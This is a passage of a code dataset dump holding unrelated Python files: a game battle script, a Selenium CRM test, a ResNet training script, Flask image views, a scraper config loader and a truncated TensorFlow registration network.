uniqueToString) to send instance unique variables to a string to\r\n get added to the dumpToLog override.\r\n \"\"\"\r\n\r\n def chapterUnits(self):\r\n #use this to re-define the list of units, as basically all battles should\r\n #use something different from the default of no units\r\n self.settings[\"combatantList\"] = {}\r\n self.settings[\"combatantList\"][\"pc\"] = []\r\n \r\n #Append PC's to be added here\r\n self.settings[\"combatantList\"][\"pc\"].append(unit_module.BasicGroundUnit())\r\n \r\n \r\n self.settings[\"combatantList\"][\"npc\"] = []\r\n #append NPC's to be added here \r\n \r\n self.settings[\"TotNumOfPCs\"] = 0 \r\n self.settings[\"TotNumOfNPCs\"] = 0\r\n for item in range(len(self.settings[\"combatantList\"][\"pc\"])):\r\n self.settings[\"TotNumOfPCs\"] += 1\r\n for item in range(len(self.settings[\"combatantList\"][\"npc\"])):\r\n self.settings[\"TotNumOfNPCs\"] += 1\r\n\r\n\r\n\r\n#################################################################\r\n#################################################################\r\n ","sub_path":"game/darkness/base/battleScripts.py","file_name":"battleScripts.py","file_ext":"py","file_size_in_byte":16122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"242098710","text":"# voted={}\n#\n# def check_voter(name):\n# if voted.get(name):\n# print(\"kick them out\")\n# else:\n# print(\"let him vote\")\n#\n# check_voter(\"tom\")\n# check_voter(\"mike\")\n# check_voter(\"mike\")\n\n# the costs table\ninfinity=float(\"inf\")\ncosts={}\ncosts[\"a\"]=6\ncosts[\"b\"]=2\ncosts[\"fin\"]=infinity\nprint(costs)\n\nfor i in costs:\n print(i)\n\nfor j in costs.keys():\n print(j)\n\nfor value in costs.values():\n print(value)","sub_path":"algorithm/list_test.py","file_name":"list_test.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"288579689","text":"import soccersimulator, soccersimulator.settings\nfrom soccersimulator import AbstractStrategy, SoccerAction\nfrom soccersimulator import SoccerTeam, SoccerMatch\nfrom soccersimulator import Vector2D, Player, SoccerTournament\nclass RandomStrategy(AbstractStrategy):\n def __init__(self):\n AbstractStrategy.__init__(self, \"Random\")\n def compute_strategy(self, state, id_team, id_player):\n return SoccerAction(Vector2D.create_random(),\n Vector2D.create_random())\n\nteam1 = SoccerTeam(\"team1\", [Player(\"t1j1\", RandomStrategy())])\nteam2 = SoccerTeam(\"team2\", 
[Player(\"t2j1\", RandomStrategy())])\nteam3 = SoccerTeam(\"team3\", [Player(\"t3j1\", RandomStrategy())])\nmatch = SoccerMatch(team1, team2)\nsoccersimulator.show(match)\ntournoi = SoccerTournament(1)\ntournoi.add_team(team1)\ntournoi.add_team(team2)\ntournoi.add_team(team3)\nsoccersimulator.show(tournoi)\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130949032","text":"import selenium.webdriver.support.ui as ui\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\nimport variables\nfrom abstract_test import AbstractTest\n\n\nclass CloudTest(AbstractTest):\n def setUp(self):\n super(CloudTest, self).setUp()\n\n def tearDown(self):\n super(CloudTest, self).tearDown()\n\n def Login(self):\n self.console_green('... : Login ')\n self.driver.get(variables.first_step_base_url)\n try:\n WebDriverWait(self.driver, 10).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, variables.login_button_css))\n )\n except:\n self.driver.quit()\n\n self.wait_until_find_by_css(variables.login_button_css).click()\n self.wait_until_find_by_id(variables.username_field_id).send_keys(variables.credential_user)\n self.wait_until_find_by_id(variables.password_field_id).send_keys(variables.credential_password)\n self.wait_until_find_by_css(variables.login_credential__button_css).click()\n try:\n assert self.driver.current_url == variables.page_url\n except:\n self.console_green('... : Login Page Error')\n self.driver.quit()\n\n def Create_Lead(self):\n self.console_green('... : Create Lead ')\n self.driver.get(variables.page_url)\n self.wait_until_find_by_id(variables.lead_button_id).click()\n self.wait_until_find_by_id(variables.new_lead_button_id).click()\n self.last_name = self.random_string(7) # lead name\n company_name = self.random_string(7)\n self.wait_until_find_by_id(variables.last_name_field_id).send_keys(self.last_name)\n self.wait_until_find_by_id(variables.company_name_field_id).send_keys(company_name)\n self.wait_until_find_by_css(variables.save_new_lead_button_css).click()\n\n\n def Change_status(self, default_status):\n self.console_green('... : Change status for Lead ')\n self.driver.get(variables.leads_url)\n self.wait_until_find_by_css(variables.settings_button_css).click()\n self.wait_until_find_by_xpath(variables.settings_xpath).click()\n self.wait_until_find_by_xpath(variables.leads_xpath).click()\n self.wait_until_find_by_css(variables.leads_statuses_css).click()\n self.wait_until_find_by_xpath(variables.new_status_edit_button_xpath).click()\n if default_status == '':\n self.new_status = self.random_string(4)\n else:\n self.new_status = default_status\n self.wait_until_find_by_css(variables.name_field_css).clear()\n self.wait_until_find_by_css(variables.name_field_css).send_keys(self.new_status)\n self.wait_until_find_by_css(variables.save_lead_status_button_css).click()\n self.wait_until_find_by_id(variables.lead_button_id).click()\n self.console_green('... : Lead status is %s ' % self.new_status)\n\n def Check_new_status_at_Lead(self):\n self.driver.get(variables.leads_url)\n self.console_green('... 
: Check new Lead status')\n self.wait_until_find_by_css(variables.lead_serch_input_css).send_keys(self.last_name)\n self.wait_until_find_by_css(variables.lead_with_new_status_css).click()\n if self.wait_until_find_by_css(variables.status_lead_css).text == self.new_status:\n self.console_green('... : Lead status was changed ')\n else:\n self.console_green('... : Lead status NOT changed')\n self.driver.quit()\n\n def test_Delete_lead(self):\n self.driver.get(variables.leads_url)\n wait = ui.WebDriverWait(self.driver, 10)\n self.console_green('... Delete test DATA')\n self.driver.get(variables.leads_url)\n self.wait_until_find_by_css(variables.lead_serch_input_css).clear()\n self.wait_until_find_by_css(variables.select_all_css).click()\n wait.until(lambda driver: self.wait_until_find_by_xpath(variables.more_action_xpath))\n self.wait_until_find_by_xpath(variables.more_action_xpath).click()\n self.wait_until_find_by_css(variables.delete_all_lead_css).click()\n self.wait_until_find_by_css(variables.confim_delete_all_css).click()\n\n # def cloud_steps(self):\n # for name in sorted(dir(self)):\n # if name.startswith(\"cloud_step\"):\n # yield name, getattr(self, name)\n #\n # def test_cloud_steps(self):\n # for name, step in self.cloud_steps():\n # try:\n # step()\n # except Exception as e:\n # self.fail(\"{} failed ({}: {})\".format(step, type(e), e))\n\n\ndef test_create_cluster():\n ct = CloudTest()\n ct.setUp()\n ct.Login()\n ct.Create_Lead()\n ct.Change_status('')\n ct.Check_new_status_at_Lead()\n ct.Change_status('New')\n ct.test_Delete_lead()\n ct.tearDown()\n","sub_path":"test_suit.py","file_name":"test_suit.py","file_ext":"py","file_size_in_byte":4977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"609061312","text":"\"\"\" Rank Search\n Link: https://programmers.co.kr/learn/courses/30/lessons/72412\n\"\"\"\ndef solution(orders, course):\n answer = []\n os = list(''.join(sorted(o)) for o in orders)\n import itertools, collections\n for l in course:\n counter = collections.Counter(''.join(c) for o in os for c in itertools.combinations(o, l))\n if len(counter) > 0:\n x = max(counter.values())\n for k, v in counter.items():\n if v > 1 and v == x:\n answer.append(k)\n return sorted(answer)\n","sub_path":"2021W05/q/72411.py","file_name":"72411.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"488076485","text":"# ResNet34 - Fixed\n# 2 FC layers\n\nimport time\nimport os\nimport copy\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.autograd import Variable\nimport numpy as np\nimport torchvision\nfrom torchvision import datasets, models, transforms\nimport matplotlib.pyplot as plt\n\nfrom .dataset import split_train_val\n\ndataset_sizes = {}\ndataloaders = {}\nimage_datasets = {}\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nuse_gpu = torch.cuda.is_available()\n\ndef train_model(model, criterion, optimizer, scheduler, num_epochs=25):\n since = time.time()\n\n best_model_wts = model.state_dict()\n best_acc = 0.0\n\n FloatTensor = torch.cuda.FloatTensor if use_gpu else torch.FloatTensor\n LongTensor = torch.cuda.LongTensor if use_gpu else torch.LongTensor\n ByteTensor = torch.cuda.ByteTensor if use_gpu else torch.ByteTensor\n Tensor = FloatTensor\n\n for epoch in range(num_epochs):\n print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n print('-' * 
10)\n\n # Each epoch has a training and validation phase\n for phase in ['train', 'val']:\n since_epoch = time.time()\n if phase == 'train':\n scheduler.step()\n model.train(True) # Set model to training mode\n else:\n model.train(False) # Set model to evaluate mode\n\n running_loss = 0.0\n running_corrects = 0\n\n # Iterate over data.\n for data in dataloaders[phase]:\n # get the inputs\n inputs, labels = data\n\n inputs = inputs.to(device)\n labels = labels.to(device)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n\n # forward\n outputs = model(inputs)\n _, preds = torch.max(outputs.data, 1)\n loss = criterion(outputs, labels)\n\n # backward + optimize only if in training phase\n if phase == 'train':\n loss.backward()\n optimizer.step()\n \n # statistics\n running_loss += loss.data.item()\n running_corrects += torch.sum(preds == labels.data)\n\n epoch_loss = running_loss / len(image_datasets[phase])\n epoch_acc = running_corrects.type(FloatTensor) / len(image_datasets[phase])\n\n time_elapsed_epoch = time.time() - since_epoch\n print('{} Loss: {:.4f} Acc: {:.4f} in {:.0f}m {:.0f}s'.format(\n phase, epoch_loss, epoch_acc, time_elapsed_epoch // 60, time_elapsed_epoch % 60))\n\n # deep copy the model\n if phase == 'val' and epoch_acc > best_acc:\n best_acc = epoch_acc\n best_model_wts = model.state_dict()\n print()\n\n time_elapsed = time.time() - since\n print('Training complete in {:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60))\n print('Best val Acc: {:4f}'.format(best_acc))\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n\ndef init_data():\n global dataloaders\n global dataset_sizes\n global image_datasets\n global device\n # Data augmentation and normalization for training\n # Just normalization for validation\n train_transform = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n val_transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ])\n\n data_dir = 'train'\n image_datasets['train'], image_datasets['val'] = split_train_val(data_dir, train_transform=train_transform, val_transform=val_transform)\n dataloaders = {x: torch.utils.data.DataLoader(image_datasets[x], batch_size=4,\n shuffle=True, num_workers=4)\n for x in ['train', 'val']}\n dataset_sizes = {x: len(image_datasets[x]) for x in ['train', 'val']}\n\n return dataloaders\n\ndef finetune(model):\n num_ftrs = model.fc.in_features\n model.fc = nn.Linear(num_ftrs, 120)\n\n model = model.to(device)\n criterion = nn.CrossEntropyLoss()\n\n # Observe that all parameters are being optimized\n optimizer_ft = optim.SGD(model.parameters(), lr=0.001, momentum=0.9)\n\n # Decay LR by a factor of 0.1 every 7 epochs\n exp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1)\n\n model = train_model(model, criterion, optimizer_ft, exp_lr_scheduler,\n num_epochs=25)\n return model\n\ndef train_fc(model):\n for param in model.parameters():\n param.requires_grad = False\n\n # Parameters of newly constructed modules have requires_grad=True by default\n num_ftrs = model.fc.in_features\n H1 = 240\n C = 120\n model.fc = nn.Linear(num_ftrs, H1)\n model = nn.Sequential(\n model, \n nn.ReLU(),\n nn.Linear(H1,C)\n )\n\n model = model.to(device)\n criterion = nn.CrossEntropyLoss()\n\n # Observe that only parameters of final layer are being 
optimized as\n # opposed to before.\n optimizer_conv = optim.SGD(filter( lambda p: p.requires_grad, model.parameters() ), lr=0.001, momentum=0.9)\n\n # Decay LR by a factor of 0.1 every 7 epochs\n exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=7, gamma=0.1)\n\n model = train_model(model, criterion, optimizer_conv,\n exp_lr_scheduler, num_epochs=25)\n\n return model\n\ndef main():\n init_data()\n\n model = models.resnet34(pretrained=True)\n train_fc(model)\n return model\n\nif __name__ == '__main__':\n main()\n","sub_path":"main_res34_2fc_resize.py","file_name":"main_res34_2fc_resize.py","file_ext":"py","file_size_in_byte":5941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"284314725","text":"from flask import Flask, current_app, abort, render_template\nfrom flask.views import MethodView\n\nfrom . import images\nfrom .mixins import ProcessImageMixin\n\napp = Flask(__name__)\nwith app.app_context():\n app = current_app\n\n\ndef image_config() -> dict:\n image_config = app.config.get(\"IMAGE_CONFIG\", {})\n return image_config\n\n\ndef get_thumbnail_size() -> int:\n thumbnail_size = image_config()[\"thumbnail_size\"]\n if not isinstance(thumbnail_size, int):\n raise Exception\n return thumbnail_size\n\n\ndef get_quality_size() -> int:\n thumbnail_size = image_config()[\"quality\"]\n if not isinstance(thumbnail_size, int):\n raise Exception\n return thumbnail_size\n\n\nclass ResizeImageView(ProcessImageMixin, MethodView):\n def get(self, filename, size=0):\n if app.storage.is_exist(filename):\n content = app.storage.read(filename)\n return self.resize(content=content, size=size)\n else:\n return abort(404)\n\n\nclass GrayImageView(ProcessImageMixin, MethodView):\n def get(self, filename):\n if app.storage.is_exist(filename):\n content = app.storage.read(filename)\n return self.to_gray(content=content)\n else:\n return abort(404)\n\n\nclass AsciiArtImageView(ProcessImageMixin, MethodView):\n def get(self, filename):\n if app.storage.is_exist(filename):\n content = app.storage.read(filename)\n return render_template(\"images/aimg.html\", aimg=self.to_asciiart(content))\n else:\n return abort(404)\n\n\nimages.add_url_rule(\n \"//resize/\",\n view_func=ResizeImageView.as_view(\"image-processor-thumbnail\"),\n)\nimages.add_url_rule(\n \"//resize/\",\n view_func=ResizeImageView.as_view(\"image-processor\"),\n)\n\nimages.add_url_rule(\n \"//l/\", view_func=GrayImageView.as_view(\"image-gray\")\n)\n\nimages.add_url_rule(\n \"//ascii/\", view_func=AsciiArtImageView.as_view(\"image-ascii\")\n)\n","sub_path":"apps/views/images/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"130126847","text":"# coding: utf-8\n\"\"\"\nLoad the config json file.\n\"\"\"\n\nfrom collections import OrderedDict\nfrom past.builtins import basestring\nimport json\nimport os\nimport re\nimport copy\nimport platform\nimport time\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.desired_capabilities import DesiredCapabilities\n\nfrom strategies.abstract_strategy import AbstractStrategy\nfrom custom_middleware import CustomMiddleware\nfrom js_executor import JsExecutor\nimport helpers\n\ntry:\n from urlparse import urlparse\n from urllib import unquote_plus\nexcept ImportError:\n from urllib.parse import urlparse, unquote_plus\n\n\nclass ConfigLoader(object):\n \"\"\"\n ConfigLoader\n \"\"\"\n # We define them 
here so the linters/autocomplete know what to expect\n allowed_domains = None\n api_key = None\n app_id = None\n custom_settings = None\n index_name = None\n index_prefix = None\n selectors = None\n selectors_exclude = []\n start_urls = None\n stop_urls = []\n strategy = None\n strip_chars = u\".,;:§¶\"\n min_indexed_level = 0\n scrap_start_urls = True\n strict_redirect = False\n remove_get_params = False\n login = None\n keep_tags = []\n extra_records = []\n\n\n # data storage, starting here attribute are not config params\n config_file = None\n config_content = None\n config_original_content = None\n\n driver = None\n\n def __init__(self, config, index_prefix=''):\n if os.path.isfile(config):\n self.config_file = config\n with open(self.config_file, 'r') as f:\n config = f.read()\n\n try:\n self.config_original_content = config\n data = json.loads(config, object_pairs_hook=OrderedDict)\n self.config_content = copy.deepcopy(data)\n except ValueError:\n raise ValueError('CONFIG is not a valid JSON')\n\n # Check for all mandatory variables\n data = self.assert_config(data)\n\n # Merge other ENV variables\n data['app_id'] = os.environ['APPLICATION_ID']\n data['api_key'] = os.environ['API_KEY']\n data['index_prefix'] = index_prefix\n\n # Expose all the data as attributes\n data['index_name'] = data['index_prefix'] + data['index_name']\n for key, value in data.items():\n setattr(self, key, value)\n\n AbstractStrategy.keep_tags = self.keep_tags\n\n if self.conf_need_browser():\n self.init()\n\n self.start_urls = self.parse_urls(self.start_urls)\n self.selectors = self.parse_selectors(self.selectors)\n\n self.min_indexed_level = self.get_min_indexed_level_object(self.min_indexed_level)\n\n if self.login is not None:\n self.js_render = True\n self.open_login_url()\n\n if self.conf_need_browser() and not self.js_render:\n self.destroy()\n\n @staticmethod\n def get_min_indexed_level_object(min_indexed_level):\n min_indexed_level_object = min_indexed_level\n if isinstance(min_indexed_level, int):\n min_indexed_level_object = {\n 'default': min_indexed_level_object\n }\n\n return min_indexed_level_object\n\n def conf_need_browser(self):\n group_regex = re.compile(\"\\\\(\\?P<(.+?)>.+?\\\\)\")\n results = re.findall(group_regex, self.config_original_content)\n\n return len(results) > 0 or self.js_render\n\n def init(self):\n # Start firefox if needed\n self.driver = webdriver.Firefox()\n self.driver.implicitly_wait(1)\n CustomMiddleware.driver = self.driver\n JsExecutor.driver = self.driver\n\n def destroy(self):\n # Start firefox if needed\n if self.driver is not None:\n self.driver.quit()\n self.driver = None\n\n @staticmethod\n def parse_selectors_set(config_selectors):\n selectors_set = {}\n for key in config_selectors:\n if key != 'text':\n selectors_set[key] = config_selectors[key]\n else:\n # Backward compatibility, rename text to content\n key = 'content'\n selectors_set[key] = config_selectors['text']\n\n # Backward compatibility, if it's a string then we put it in an object\n if isinstance(selectors_set[key], basestring):\n selectors_set[key] = {'selector': selectors_set[key]}\n\n # Global\n if 'global' in selectors_set[key]:\n selectors_set[key]['global'] = bool(selectors_set[key]['global'])\n else:\n selectors_set[key]['global'] = False\n\n # Type\n if 'type' in selectors_set[key]:\n if selectors_set[key]['type'] not in ['xpath', 'css']:\n raise Exception(\n selectors_set[key]['type'] + 'is not a good selector type, it should be `xpath` or `css`')\n else:\n selectors_set[key]['type'] = 
'css'\n\n if selectors_set[key]['type'] == 'css':\n selectors_set[key]['selector'] = AbstractStrategy.css_to_xpath(selectors_set[key]['selector'])\n\n # We don't need it because everything is xpath now\n selectors_set[key].pop('type')\n\n # Default value\n selectors_set[key]['default_value'] = selectors_set[key]['default_value'] if 'default_value' in selectors_set[\n key] else None\n\n # Strip chars\n selectors_set[key]['strip_chars'] = selectors_set[key]['strip_chars'] if 'strip_chars' in selectors_set[key] else None\n\n return selectors_set\n\n @staticmethod\n def parse_selectors(config_selectors):\n selectors = {}\n\n if 'lvl0' in config_selectors:\n config_selectors = {'default': config_selectors}\n\n for selectors_key in config_selectors:\n selectors[selectors_key] = ConfigLoader.parse_selectors_set(config_selectors[selectors_key])\n\n return selectors\n\n def get_extra_facets(self):\n extra_facets = []\n for start_url in self.start_urls:\n for tag in start_url['url_attributes']:\n extra_facets.append(tag)\n\n extra_facets = set(extra_facets)\n\n return list(extra_facets)\n\n @staticmethod\n def parse_urls(config_start_urls):\n start_urls = []\n for start_url in config_start_urls:\n if isinstance(start_url, basestring):\n start_url = {'url': start_url}\n\n start_url['compiled_url'] = re.compile(start_url['url'])\n\n if \"page_rank\" not in start_url:\n start_url['page_rank'] = 0\n\n if \"tags\" not in start_url:\n start_url['tags'] = []\n\n if \"selectors_key\" not in start_url:\n start_url['selectors_key'] = 'default'\n\n matches = ConfigLoader.get_url_variables_name(start_url['url'])\n\n start_url['url_attributes'] = {}\n for match in matches:\n if len(start_url['url']) > 2 and start_url['url'][-2:] == '?)':\n print('\\033[0;35mWARNING: ' + start_url['url'] + ' finish by a variable.'\n ' The regex probably won\\'t work as expected.'\n ' Add a \\'/\\' or \\'$\\' to make it work properly\\033[0m')\n start_url['url_attributes'][match] = None\n\n # If there is tag(s) we need to generate all possible urls\n if len(matches) > 0:\n values = {}\n for match in matches:\n if 'variables' in start_url:\n if match in start_url['variables']:\n if isinstance(start_url['variables'][match], list):\n values[match] = start_url['variables'][match]\n else:\n if 'url' in start_url['variables'][match] and 'js' in start_url['variables'][match]:\n executor = JsExecutor()\n values[match] = executor.execute(start_url['variables'][match]['url'], start_url['variables'][match]['js'])\n else:\n raise Exception(\"Bad arguments for variables.\" + match + \" for url \" + start_url['url'])\n else:\n raise Exception(\"Missing \" + match + \" in variables\" + \" for url \" + start_url['url'])\n\n start_urls = ConfigLoader.geturls(start_url, matches[0], matches[1:], values, start_urls)\n\n # If there is no tag just keep it like this\n else:\n start_urls.append(start_url)\n return start_urls\n\n def open_login_url(self):\n self.driver.get(unquote_plus(self.login['url']))\n time.sleep(self.login['time'])\n\n @staticmethod\n def get_url_variables_name(url):\n # Cache it to avoid to compile it several time\n if not hasattr(ConfigLoader.get_url_variables_name, 'group_regex'):\n ConfigLoader.get_url_variables_name.group_regex = re.compile(\"\\\\(\\?P<(.+?)>.+?\\\\)\")\n\n return re.findall(ConfigLoader.get_url_variables_name.group_regex, url)\n\n @staticmethod\n def geturls(start_url, current_match, matches, values, start_urls):\n for value in values[current_match]:\n copy_start_url = copy.copy(start_url)\n 
copy_start_url['original_url'] = copy_start_url['url']\n copy_start_url['url'] = copy_start_url['url'].replace(\"(?P<\"+current_match+\">.*?)\", value)\n copy_start_url['compiled_url'] = re.compile(copy_start_url['url'])\n # Fix weird reference issue\n copy_start_url['url_attributes'] = copy.deepcopy(start_url['url_attributes'])\n copy_start_url['url_attributes'][current_match] = value\n\n if len(matches) == 0:\n start_urls.append(copy_start_url)\n else:\n start_urls = ConfigLoader.geturls(copy_start_url, matches[0], matches[1:], values, start_urls)\n \n return start_urls\n\n @staticmethod\n def assert_config(user_data):\n \"\"\"Check for all needed parameters in config\"\"\"\n\n # Set default values\n default_data = {\n 'start_urls': [],\n 'stop_urls': []\n }\n data = default_data.copy()\n data.update(user_data)\n\n if not data.get('index_name'):\n raise ValueError('index_name is not defined')\n\n # Start_urls is mandatory\n if not data.get('start_urls'):\n raise ValueError('start_urls is not defined')\n\n # Start urls must be an array\n if not isinstance(data.get('start_urls'), list):\n data['start_urls'] = [data['start_urls']]\n\n # Stop urls must be an array\n if not isinstance(data.get('stop_urls'), list):\n data['stop_urls'] = [data['stop_urls']]\n\n # Build default allowed_domains from start_urls and stop_urls\n if not data.get('allowed_domains'):\n if not data.get('allowed_domains'):\n def get_domain(url):\n \"\"\" Return domain name from url \"\"\"\n return urlparse(url).netloc\n\n # Concatenating both list, being careful that they can be None\n all_urls = [_['url'] if not isinstance(_, basestring) else _ for _ in data.get('start_urls', [])] + data.get('stop_urls', [])\n # Getting the list of domains for each of them\n all_domains = [get_domain(_) for _ in all_urls]\n # Removing duplicates\n all_domains_unique = []\n for domain in all_domains:\n if domain in all_domains_unique:\n continue\n all_domains_unique.append(domain)\n\n data['allowed_domains'] = all_domains_unique\n\n # Allowed domains must be an array\n if not isinstance(data.get('allowed_domains'), list):\n data['allowed_domains'] = [data['allowed_domains']]\n\n # Set default strategy\n data['strategy'] = data.get('strategy') or 'default'\n\n # `js_render` is set to False by default unless `true` is specified\n if isinstance(data.get('js_render'), bool):\n data['js_render'] = data.get('js_render')\n else:\n data['js_render'] = False\n\n # `js_wait` is set to 0s by default unless it is specified\n if isinstance(data.get('js_wait'), int):\n data['js_wait'] = data.get('js_wait')\n else:\n data['js_wait'] = 0\n\n # `use_anchors` is set to True by default unless `false` is specified\n if isinstance(data.get('use_anchors'), bool):\n data['use_anchors'] = data.get('use_anchors')\n else:\n data['use_anchors'] = False\n\n return data\n\n def update_nb_hits(self, nb_hits):\n if self.config_file is not None:\n previous_nb_hits = None if 'nb_hits' not in self.config_content else self.config_content['nb_hits']\n\n if previous_nb_hits is None or previous_nb_hits != nb_hits:\n print(\"previous nb_hits: \" + str(previous_nb_hits))\n print(\"\")\n\n if helpers.confirm('Do you want to update the nb_hits in ' + self.config_file + ' ?'):\n try:\n self.config_content['nb_hits'] = nb_hits\n with open(self.config_file, 'w') as f:\n f.write(json.dumps(self.config_content, indent=2, separators=(',', ': ')))\n print(\"\")\n print(\"[OK] \" + self.config_file + \" has been updated\")\n except Exception:\n print(\"\")\n print(\"[KO] \" + \"Was not 
able to update \" + self.config_file)\n\n def get_extra_records(self):\n return self.extra_records","sub_path":"scraper/src/config_loader.py","file_name":"config_loader.py","file_ext":"py","file_size_in_byte":13960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"420016500","text":"from django.core.urlresolvers import resolve\nfrom django.test.testcases import TestCase\nfrom 試驗.書面表.書面試驗表 import 書面試驗表\nfrom 拍字.介面.搜揣 import 看書面的逝\n\n\nclass 介面試驗(TestCase):\n def setUp(self):\n self.書面 = 書面試驗表.新增一筆書面(編號='33', 文章名='333', 作者='33', 類別='S3')\n self.書面.新增資料(\n None,\n 漢字='媠巧靚,\\n豬仔誠古錐,',\n 臺羅='Sui2-khiau2-tsiang5,\\n ti1-a2 tsiann5 koo2-tsui1,'\n )\n\n def test_對應函式(self):\n 對應 = resolve('/搜揣/文章/1/5')\n self.assertEqual(對應.func, 看書面的逝)\n\n def test_有逝數(self):\n 回應 = self.client.get('/搜揣/文章/{}/0'.format(self.書面.id))\n self.assertEqual(\n 回應.json()['逝數'], 2\n )\n\n def test_有漢字(self):\n 回應 = self.client.get('/搜揣/文章/{}/0'.format(self.書面.id))\n self.assertEqual(\n 回應.json()['漢字'], '媠巧靚,'\n )\n\n def test_有臺羅(self):\n 回應 = self.client.get('/搜揣/文章/{}/0'.format(self.書面.id))\n self.assertEqual(\n 回應.json()['臺羅'], 'Sui2-khiau2-tsiang5,'\n )\n\n def test_揣超過(self):\n 回應 = self.client.get('/搜揣/文章/{}/3'.format(self.書面.id))\n self.assertEqual(回應.json(), {'失敗': '攏總 2 句爾'})\n","sub_path":"試驗/搜揣/test介面看試驗.py","file_name":"test介面看試驗.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188378870","text":"import numpy as np\nimport os, time, datetime, sys\nimport tensorflow as tf\nimport shutil\nimport matplotlib.pyplot as plt\nimport Functions.RegNet as RegNet\nimport Functions.RegNetThread as RegNetThread\nimport Functions.PyFunctions as PF\n\n# %%-------------------------------------------h.sokooti@gmail.com--------------------------------------------\n\nmyDate = current_time = datetime.datetime.now()\nLOGDIR = '/home/hsokooti/DL/RegNet/TB/2DB/'\nExp='MICCAI3D_{:04d}{:02d}{:02d}_{:02d}{:02d}'.format(myDate.year, myDate.month, myDate.day, myDate.hour, myDate.minute, myDate.second)\n\n# saving the current script\nif not(os.path.isdir(LOGDIR + 'train' + Exp+'/Model/')):\n os.makedirs(LOGDIR + 'train' + Exp+'/Model/')\n print('folder created')\nshutil.copy(os.path.realpath(__file__),LOGDIR + 'train' + Exp+'/Model/')\nsys.stdout = PF.Logger(LOGDIR + 'train' + Exp+'/Model/log.txt')\n\ndef RegNet_model(learning_rate = 1E-4 , max_steps = 1000):\n tf.reset_default_graph()\n sess = tf.Session()\n\n x = tf.placeholder(tf.float32, shape=[None, 29, 29, 29 , 2], name=\"x\")\n # x = tf.placeholder(tf.float32, shape=[None, None, None, 2], name=\"x\")\n\n xLow = tf.placeholder(tf.float32, shape=[None, 27, 27, 27, 2], name=\"x\")\n\n y = tf.placeholder(tf.float32, shape=[None, 1, 1, 1, 3], name=\"labels\")\n # y = tf.placeholder(tf.float32, shape=[None, None, None, 2], name=\"labels\")\n bn_training = tf.placeholder(tf.bool, name='bn_training')\n mseTrainAverage_net = tf.placeholder(tf.float32 , shape = [] )\n\n\n\n conv1F = tf.layers.conv3d(inputs=x[:,:,:,:,0,np.newaxis],filters=16,kernel_size=3, padding=\"valid\", activation=None ,name='conv1F')\n conv1F = tf.layers.batch_normalization(conv1F, training=bn_training, name='bn1F', scale=True)\n conv1F = tf.nn.relu(conv1F)\n\n conv1M = tf.layers.conv3d(inputs=x[:,:,:,:,1,np.newaxis],filters=16,kernel_size=3, padding=\"valid\", activation=None ,name='conv1M')\n conv1M = tf.layers.batch_normalization(conv1M, training=bn_training, 
name='bn1M', scale=True)\n conv1M = tf.nn.relu(conv1M)\n\n conv1FLow = tf.layers.conv3d(inputs=xLow[:,:,:,:,0,np.newaxis],filters=16,kernel_size=3, padding=\"valid\", activation=None ,name='conv1FLow')\n conv1FLow = tf.layers.batch_normalization(conv1FLow, training=bn_training, name='bn1FLow', scale=True)\n conv1FLow = tf.nn.relu(conv1FLow)\n\n conv1MLow = tf.layers.conv3d(inputs=xLow[:,:,:,:,1,np.newaxis],filters=16,kernel_size=3, padding=\"valid\", activation=None ,name='conv1MLow')\n conv1MLow = tf.layers.batch_normalization(conv1MLow, training=bn_training, name='bn1MLow', scale=True)\n conv1MLow = tf.nn.relu(conv1MLow)\n\n for i in range (2,4):\n conv1F = tf.layers.conv3d(conv1F, 16 , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'F')\n conv1F = tf.layers.batch_normalization(conv1F, training=bn_training)\n conv1F = tf.nn.relu(conv1F)\n\n for i in range(2, 4):\n conv1M = tf.layers.conv3d(conv1M, 16 , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'M')\n conv1M = tf.layers.batch_normalization(conv1M, training=bn_training)\n conv1M = tf.nn.relu(conv1M)\n\n for i in range (2,4):\n conv1FLow = tf.layers.conv3d(conv1FLow, 16 , 3, padding=\"valid\", activation=None, name='conv'+str(i)+'FLow')\n conv1FLow = tf.layers.batch_normalization(conv1FLow, training=bn_training)\n conv1FLow = tf.nn.relu(conv1FLow)\n\n for i in range (2,4):\n conv1MLow = 